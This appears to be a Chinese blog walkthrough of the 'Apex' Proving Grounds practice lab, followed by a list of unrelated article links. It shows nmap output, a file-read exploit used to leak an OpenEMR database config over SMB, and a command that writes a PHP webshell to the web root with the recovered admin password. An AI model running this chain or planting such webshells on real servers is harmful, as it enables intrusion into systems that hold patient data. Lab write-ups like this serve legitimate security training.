nmap扫描 
  1. ┌──(rootkali)-[~]
  2. └─# nmap -p- -A 192.168.157.145
  3. Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-18 04:47 UTC
  4. Nmap scan report for 192.168.157.145
  5. Host is up (0.071s latency).
  6. Not shown: 65532 filtered tcp ports (no-response)
  7. PORT     STATE SERVICE     VERSION
  8. 80/tcp   open  http        Apache httpd 2.4.29 ((Ubuntu))
  9. |_http-server-header: Apache/2.4.29 (Ubuntu)
  10. |_http-title: APEX Hospital
  11. 445/tcp  open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
  12. 3306/tcp open  mysql       MySQL 5.5.5-10.1.48-MariaDB-0ubuntu0.18.04.1
  13. | mysql-info:
  14. |   Protocol: 10
  15. |   Version: 5.5.5-10.1.48-MariaDB-0ubuntu0.18.04.1
  16. |   Thread ID: 33
  17. |   Capabilities flags: 63487
  18. |   Some Capabilities: SupportsLoadDataLocal, DontAllowDatabaseTableColumn, IgnoreSpaceBeforeParenthesis, LongPassword, IgnoreSigpipes, SupportsCompression, Speaks41ProtocolOld, SupportsTransactions, InteractiveClient, Support41Auth, Speaks41ProtocolNew, FoundRows, LongColumnFlag, ODBCClient, ConnectWithDatabase, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
  19. |   Status: Autocommit
  20. |   Salt: axY46T#PJa,S@%9-v,u-
  21. |_  Auth Plugin Name: mysql_native_password
  22. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  23. Device type: general purpose|specialized|storage-misc
  24. Running (JUST GUESSING): Linux 4.X|5.X|2.6.X (90%), Crestron 2-Series (86%), HP embedded (85%)
  25. OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3
  26. Aggressive OS guesses: Linux 4.15 - 5.8 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (89%), Linux 2.6.32 (89%), Linux 5.0 (88%), Linux 5.0 - 5.5 (88%), Crestron XPanel control system (86%), HP P2000 G3 NAS device (85%)
  27. No exact OS matches for host (test conditions non-ideal).
  28. Network Distance: 4 hops
  29. Service Info: Host: APEX
  31. Host script results:
  32. | smb2-time:
  33. |   date: 2024-11-18T04:50:07
  34. |_  start_date: N/A
  35. | smb-os-discovery:
  36. |   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
  37. |   Computer name: apex
  38. |   NetBIOS computer name: APEX\x00
  39. |   Domain name: \x00
  40. |   FQDN: apex
  41. |_  System time: 2024-11-17T23:50:05-05:00
  42. | smb2-security-mode:
  43. |   3:1:1:
  44. |_    Message signing enabled but not required
  45. |_clock-skew: mean: 1h40m00s, deviation: 2h53m14s, median: 0s
  46. | smb-security-mode:
  47. |   account_used: guest
  48. |   authentication_level: user
  49. |   challenge_response: supported
  50. |_  message_signing: disabled (dangerous, but default)
  52. TRACEROUTE (using port 80/tcp)
  53. HOP RTT      ADDRESS
  54. 1   71.09 ms 192.168.45.1
  55. 2   70.53 ms 192.168.45.254
  56. 3   71.15 ms 192.168.251.1
  57. 4   71.22 ms 192.168.157.145
  59. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  60. Nmap done: 1 IP address (1 host up) scanned in 171.04 seconds

nmap扫描我们发现smba是开着的
查看他的共享文件

通过dirsearch发现两个路径

已开

192.168.157.145/openemr/

192.168.157.145/filemanager/

已开是想通过openemr 这个框架exp来 打 但是发现都需要密码登录到后台才有机会执行找到的exp

所以就将目光转移到192.168.157.145/filemanager/

搜索exp找到了一个能用的exp

https://www.exploit-db.com/exploits/49359?source=post_page-----834e61a9fc03--------------------------------

试着读取etc/passwd



能成功执行 我首先想到的就是直接读取filemanager的mysql配置文件因为3306端口是开放的

但是问题出现了

我阅读了exp的代码 大概逻辑就是会 将读取的文件复制到192.168.157.145/source/ 目录下 然后访问source读取我们想要的文件

所以就算我们将mysql配置的php代码复制 source目录中还是一个php文件 我们开不到里面的明文内容

这里卡了非常久一直没突破口

后来看了看wp

原来我们错过了一个关键信息

发现source下还有个documents目录 点进去看看 发现这不就是我们最开始发现的smba共享目录吗

也就是说我们只要将mysql配置文件复制到documents目录下我们就可以利用smba下载并读取了 确实是我疏忽了

查看exp并改动文件所复制到的路径

然后利用exp将/var/www/openemr/sites/default/sqlconf.php 复制到documents下 这里sqlconf.php 是我们信息收集上github上找到的路径

利用smb下载并读取文件

查看配置文件



进数据库看密码 发现是加密的 爆破出来

进后台后查看版本



跟具版本发现exp 有好多exp 找了好久才找到

https://www.exploit-db.com/exploits/45161

这里估计是靶场网络环境除了问题

我先是写了一个webshell上去

python2 exp8 http://192.168.157.145/openemr -u admin -p thedoctor -c 'echo "<?php system(\$_POST[a]);phpinfo() ?>" > /var/www/html/shell.php'

发现是成功了但是就是 反弹不了shell 我看了看wp 操作和我一模一样但我就是反弹不了 执行的命令和反弹端口都一样也不行

没办法只能止步于此

但是我看了看后面提权非常简单

就是su root 加上 我们之前得到的密码就ok了

只能怪pg靶场不稳定了 整体算下来这个靶场做了大概5-6小时 确实小难

Apex pg walkthrough Intermediate的更多相关文章

  1. 简析服务端通过GT导入SHP至PG的方法

    文章版权由作者李晓晖和博客园共有,若转载请于明显处标明出处:http://www.cnblogs.com/naaoveGIS/ 1.背景 项目中需要在浏览器端直接上传SHP后服务端进行数据的自动入PG ...

  2. salesforce 零基础学习(六十一)apex:component简单使用以及图片轮转播放的实现

    有的时候,我们项目有可能有类似需求:做一个简单的图像轮转播放功能,不同的VF页面调用可以显示不同的图片以及不同的图片描述.这种情况,如果在每个页面单独处理相关的图像轮转播放则显得代码特别冗余,此种情况 ...

  3. salesforce 零基础学习(五十九)apex:param使用以及相关的疑惑

    做web项目难免要从一个页面传参数,解析参数中的值进行相关处理以后跳转到其他页面,VF中也不例外.使用传参的标签为apex:param. apex:param标签不可以单独使用,需要作为子标签嵌套在相 ...

  4. Salesforce Apex 使用JSON数据的示例程序

    本文介绍了一个在Salesforce Apex中使用JSON数据的示例程序, 该示例程序由以下几部分组成: 1) Album.cls, 定了了封装相关字段的数据Model类 2) RestClient ...

  5. Salesforce Apex页面中调用远端网络服务

    本文介绍了Salesforce Apex页面中调用远端网络服务的实现过程. ### 注册远端网络服务 在使用Apex代码调用远端网络服务之前,首先需要在Salesforce中注册远端网络服务地址, 本 ...

  6. Salesforce Apex 开发环境设置和Hello World示例

    本文介绍了Salesforce Apex开发环境的设置以及一个简单的Hello World示例的实现过程. Salesforce开发环境 Salesforce通过http://developer.fo ...

  7. Bootstap datetimepicker报错TypeError: intermediate value

    Bootstrap datetimepicker有多个版本,官方的链接中,只是datepicker,没有时间的选择,原版的datetimepicker也不再更新,不能用新版的jquery.现在http ...

  8. APEX初步

    APEX是SFDC中用于开发的语言.语法上类似JAVA等面向对象的语言,运行起来类似数据库中的存储过程.可以在SFDC事件中添加业务逻辑,操作相关数据和用在Visual Force页面中. 保存,编译 ...

  9. PG 中 JSON 字段的应用

    13 年发现 pg 有了 json 类型,便从 oracle 转 pg,几年下来也算比较熟稔了,总结几个有益的实践. 用途一:存储设计时无法预料的文档性的数据.比如,通常可以在人员表准备一个 json ...

  10. pg gem 安装(postgresql94)

    使用下面命令安装报错 gem install pg 错误: [root@AS-test middle_database]# gem install pgBuilding native extensio ...

随机推荐

  1. 【原创】PREEMPT-RT 系统cpu使用率周期CPU飙高问题

    PREEMPT-RT 系统cpu使用率周期CPU飙高问题 目录 PREEMPT-RT 系统cpu使用率周期CPU飙高问题 背景 现象 复现条件 原因 解决措施 背景 在22年进行PREEMPT-RT系 ...

  2. 解决Delphi应用程序向桌面资源管理拖放问题 win10,winxp,win2003测试成功

    解决Delphi应用程序向桌面资源管理拖放问题 win10,winxp,win2003测试成功 如果是实体拖动,是比较好解决的. 如果是虚拟应用程序数据,拖动到本机桌面或资源管理器目录下,获取目录路径 ...

  3. vue+laravel使用微信Natvite支付

    Navite支付介绍 Native支付是指商户系统按微信支付协议生成支付二维码,用户再用微信"扫一扫"完成支付的模式.适用于PC网站.实体店单品或订单.媒体广告支付等场景 1.先阅 ...

  4. nginx之访问控制

    Nginx的源码提供了ngx_http_auth_basic_module这个模块,它可以来解决web访问认证的问题.这个模块是默认就编译进nginx的,可以直接拿来使用. ngx_http_auth ...

  5. 【实战问题】-- 并发的时候分布式锁setnx细节

    前面讲解到实战问题]-- 设计礼品领取的架构设计以及多次领取现象解决?,如果出现网络延迟的情况下,多个请求阻塞,那么恶意攻击就可以全部请求领取接口成功,而针对这种做法,我们使用setnx来解决,确保只 ...

  6. python语言实现_通过端口转发实现跨网络(多网络之间)通信_science_network

    本文使用python语言实现了一个端口转发的程序,该程序可以实现多网络之间的信息通信,当然这里有个前提,那就是多个网络都在一台主机上有可以连通的端口. 之所以有这个编写代码的需求,是因为最近使用的sc ...

  7. C#/.NET/.NET Core优秀项目和框架2024年11月简报

    前言 公众号每月定期推广和分享的C#/.NET/.NET Core优秀项目和框架(每周至少会推荐两个优秀的项目和框架当然节假日除外),公众号推文中有项目和框架的详细介绍.功能特点.使用方式以及部分功能 ...

  8. Uniapp input的maxlength问题

    前情 uni-app是我很喜欢的跨平台框架,它能开发小程序,H5,APP(安卓/iOS),对前端开发很友好,自带的IDE让开发体验也很棒,公司项目就是主推uni-app. 坑位 最近在做一个input ...

  9. Qt No Target Architecture

    在QT中引入processthreadsapi.h,如果出现 "No Target Architecture",需要在processthreadsapi.h前引入windows.h ...

  10. Python 2.7 十六进制字符数组 转 字符串 (字符是Unicode字符)

    有一串十六进制数据,是Uncode字符. import struct strhex='003100310031' buf = strhex.decode("hex") value= ...